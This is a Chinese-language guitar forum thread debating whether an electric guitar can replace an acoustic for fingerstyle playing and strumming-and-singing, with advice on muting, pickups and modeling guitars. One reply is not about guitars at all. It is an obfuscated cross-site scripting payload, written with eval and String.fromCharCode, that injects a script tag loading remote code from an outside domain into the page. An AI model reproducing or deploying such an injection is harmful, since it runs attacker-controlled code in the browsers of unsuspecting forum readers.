lz19820717003 发表于 2017-3-26 18:34:25

有没有谁见过这样的技术?

电吉他能做到像木吉他指弹的那样的技术吗?不说音色,我知道是两种不同的发声器械,除了打板以外
其它的技术都能在电吉他上实现吗?
      我还从来没见过这样的视频,我知道是我没见识。
       有没有那位大神让我开开眼,发个连接来让我长长见识
       感激不尽

xiaonanjita 发表于 2017-3-26 18:46:32

有什么不能的 电吉他的也有箱琴模拟

lz19820717003 发表于 2017-3-26 19:05:25

xiaonanjita 发表于 2017-3-26 18:46
有什么不能的 电吉他的也有箱琴模拟

我知道有箱琴模拟,可是毕竟弦软,弦距低啥的
像抡指这样的技术在电吉他上也好实现吗?
要是电吉他真的能替代木吉他的话那我还练木吉他干嘛呢?

xiaonanjita 发表于 2017-3-26 19:21:26

很多拿电吉他指弹的啊 看怎么玩吧替代与否 看怎么想呗 你看电的 里面 还有好多人 说这个琴 不适合什么风格的 那个琴 只能弹什么什么的呢各自特点不一样 我是这么理解的 楼下大神接着说。。。

天道求亡 发表于 2017-3-26 19:56:27

除了打板,电吉他可以做木吉他的一切
但是木吉他就做不了很多电吉他技术上的东西
比如与推弦,比如右手泛音,比如摇把,比如……很多

slayest 发表于 2017-3-26 20:11:58

电吉他不能完全取代木吉他。这是因为拾音器在多条弦同时发声时的响应与单条弦独立发声再简单叠加不同,可以理解为有一定的互相干扰,在多个音的音头不重叠而又不消音时(比如分解和弦或慢扫弦)出来的声音分离度远不如木吉他。

所以两者在弹奏技巧上有着截然相反的要求。弹木吉他是越能同时让多条弦发声就越好听,而电吉他技巧反而注重消音(很多刚刚木转电的人往往一开始做不好这点,导致自己觉得弹得不错,但别人会觉得弹得“脏”)。
因此电吉他适合弹单音Solo或像power chord那样多条弦迅速扫弦,而sweep picking时必须在下一条弦发声前对上一条弦制音。木吉他古典指弹的很多曲目用电吉他弹的话不是最佳选择。

LeV1 发表于 2017-3-26 20:55:53

完全是两种乐器
虽然有Zakk Wylde用木吉他弹电音效果的
虽然也有拿把电琴弹唱的
但它们 依旧是两种乐器
想怎么玩儿 就怎么玩儿 随你开心就好

lz19820717003 发表于 2017-3-26 21:01:04

xiaonanjita 发表于 2017-3-26 19:21
很多拿电吉他指弹的啊 看怎么玩吧替代与否 看怎么想呗 你看电的 里面 还有好多人 说这个琴 不适合什么风 ...

你这样说我就不练木吉他了
没必要嘛

lz19820717003 发表于 2017-3-26 21:02:07

天道求亡 发表于 2017-3-26 19:56
但是木吉他就做不了很多电吉他技术上的东西
比如与推弦,比如右手泛音 ...

你这样说我就不练木吉他了
没必要嘛

lz19820717003 发表于 2017-3-26 21:05:49

slayest 发表于 2017-3-26 20:11
电吉他不能完全取代木吉他。这是因为拾音器在多条弦同时发声时的响应与单条弦独立发声再简单叠加不同,可以 ...

我知道电子乐器不可能完会替代传统乐器
可是像我等这样业余玩家又没那么多时间练琴,与其练两种乐器还不如专心熟练一把乐器
大不了我再买个像line6那种模拟吉他
也可以出木吉他的音色啊
再说了,我们这种业余玩家玩玩弹唱而以,又不组乐队,你说是吧。

lz19820717003 发表于 2017-3-26 21:08:59

LeV1 发表于 2017-3-26 20:55
完全是两种乐器
虽然有Zakk Wylde用木吉他弹电音效果的
虽然也有拿把电琴弹唱的

谢谢了
这样我就放心了
呵呵,就玩电的吧
再买一把LINE6 Variax standard当木吉他用
就完事了,虽然我有一把G一把F了
可是我还是想要一把专业模拟木吉他的电吉他。哈哈

x_wh 发表于 2017-3-26 21:44:35

看帖顶帖

minzhi5255 发表于 2017-3-26 22:57:09

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

俊叔叔 发表于 2017-3-26 22:58:46

能不能别逗···你拿把电吉他天天去研究应该怎么弹出木吉他的东西出来?想啥呢

am79 发表于 2017-3-26 23:16:46

水饺与蒸饺的关系,很类似但又不同,谁也不能完全代替对方。

5354 发表于 2017-3-27 11:13:41

不能完全替代,但是替代80%-90%没多大问题

qingyb 发表于 2017-4-10 15:54:36

lz19820717003 发表于 2017-4-11 23:00:16

x_wh 发表于 2017-3-26 21:44
看帖顶帖

谢谢帮顶

lz19820717003 发表于 2017-4-11 23:01:27

minzhi5255 发表于 2017-3-26 22:57

谢谢了
我以经把木吉他收起来了

lz19820717003 发表于 2017-4-11 23:04:56

俊叔叔 发表于 2017-3-26 22:58
能不能别逗···你拿把电吉他天天去研究应该怎么弹出木吉他的东西出来?想啥呢 ...

不是说一定要把电吉他玩出木吉他的境界
只是像我等步入中年的屁以我想一定是与大师绝缘的了
在有限的精力下能用一把琴自娱自乐就可以了
也许是弹唱
也许是指弹
我想我一定是不能达到很高的水准了
我只能把有限的精力专注在一种乐器上了,我想电吉他也许是我这样的大叔一个不错的选择吧
很无奈也很凄凉

lz19820717003 发表于 2017-4-11 23:07:41

am79 发表于 2017-3-26 23:16
水饺与蒸饺的关系,很类似但又不同,谁也不能完全代替对方。

不用替代
能玩就好
谢谢你的回复

lz19820717003 发表于 2017-4-11 23:11:27

5354 发表于 2017-3-27 11:13
不能完全替代,但是替代80%-90%没多大问题

有了你的回复更坚定了我练电吉他的信心

lz19820717003 发表于 2017-4-12 00:19:29

qingyb 发表于 2017-4-10 15:54

谢谢帮顶

见习维修师 发表于 2017-4-22 23:21:56

你说的不就是浓眉吗? Mateus Asato 自己看吧

lz19820717003 发表于 2017-5-29 22:40:23

见习维修师 发表于 2017-4-22 23:21

谢谢
我马上就去学习

lz19820717003 发表于 2017-5-29 22:44:37

见习维修师 发表于 2017-4-22 23:21

谢谢
我马上就去学习
页: [1]
查看完整版本: 有没有谁见过这样的技术?